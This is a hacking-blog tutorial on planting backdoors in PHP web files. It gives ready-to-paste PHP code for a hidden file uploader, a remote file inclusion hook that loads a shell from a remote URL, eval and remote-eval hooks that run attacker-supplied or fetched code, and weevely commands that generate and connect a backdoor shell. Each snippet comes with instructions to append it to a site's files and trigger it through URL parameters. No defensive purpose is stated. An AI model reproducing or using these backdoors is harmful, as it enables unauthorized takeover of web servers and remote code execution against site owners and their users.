How To Infect Web Files (php) with Backdoors and malwares and uploaders etc

Tutorial  By  Sniper haxXx

Sponsored by 


                            Voice of the IT







Today We will Learn on How to infect files like , php , asp etc

I will teach you " infecting an invisible file uploader , infecting RFI , Infecting  remote eval, Infecting Eval , Infecting Backdoor shell (weevely).

We will use the malicious codes to infect the files And All those Codes Are Below


Hidden  Uploader Code : "   <?php if($_GET['upload'] != ""){ if(!isset($_POST['upload'])){ echo '<form enctype="multipart/form-data" method="POST" action=""><br><b>File:</b><input type="file" name="file"> <input type="submit" value="Upload" name="upload"></form>'; } else{ $temporaney = $_FILES['file']['tmp_name']; $upload = $_FILES['file']['name']; if(move_uploaded_file($temporaney,$upload)) echo '<font color="green">File uppato!</font>'; else echo '<font color="red">File non uppato!</font>'; }}?>  


This is a hidden uploader malicious code ! Why i say it hidden is that it dont show the uploader till we dont command it .....like if you want to infect any file with that uploader then open that file and paste that code at the end of the file source code

After that open the file which u have infected and then command it by writing " ?upload=pakistan " and ull get the hidden uploader :)

example
www.timesofhacking.com/index.php
 then you will write www.timesofhacking.com/index.php?upload=ok





RFI Code : " <?php if($_GET['rfi'] != "") include($_GET['rfi']); ?>   "
The same thing i dont want to repeat Copy the code and paste it in the end of the file source code of any php file

then after that open the file

and write " ?rfi=http://www.your_remote_shell_link.com/shell.php "



Eval Code : "  <?php if($_GET['eval'] != "") eval($_GET['eval']); ?>  "

 The Same thing copy paste the malicious code and paste it at the end of the file which you want to infect and after that open file and command it as "  ?eval=your_eval_code_here " after the file


Remote Eval Code : " <?php if($_GET['remoteeval'] != "") eval(file_get_contents($_GET['remoteeval'])); ?>  "

This is for remote eval so after writing this code at the end of the file

write " ?remoteeval=[LINK CODE] "



Weevely Backdoor :   ( we wll generate fresh one with weevely )

Let me Tell Them That Weevely is a Pentest Tool in Backtrack and in kali which is mostly used for backdoor shell acess

And to Generate Open Weevely and Type " weevely.py generate backdoor_shell yourpassword "

The Micro Php shell will be generated in the current location of weevely where you have weevely installed.

 Then Open the Weeveely Shell WHich was generated in the current dir of weevely " Weevely.php and copy its source code and do the same thing and past its source code in any file which you want to infect but at the end after that we will connect it from weevely now open weevely and type " weevely.py http://www.your_Infected_file_path.com/Infected_file.php yourpassword 
Now t will connect it :) enjoy


Enjoy!









For More Tutorials Follow Me

@YouTube     www.youtube.com/sniperhaxx

@facebook     www.facebook.com/sniperhaxor

@blog            sniperhaxx.blogspot.com

Comments

  1. THIS ONE WAS A REALLY GREAT TUTORIAL. :D LIKED IT VERY MUCH.

    ALSO CHECK OUT MY BLOG for all kinds of hacking and cyber security tutorials http://bornhackerz.blogspot.in

    ReplyDelete

Post a Comment

Must Comment ! Dear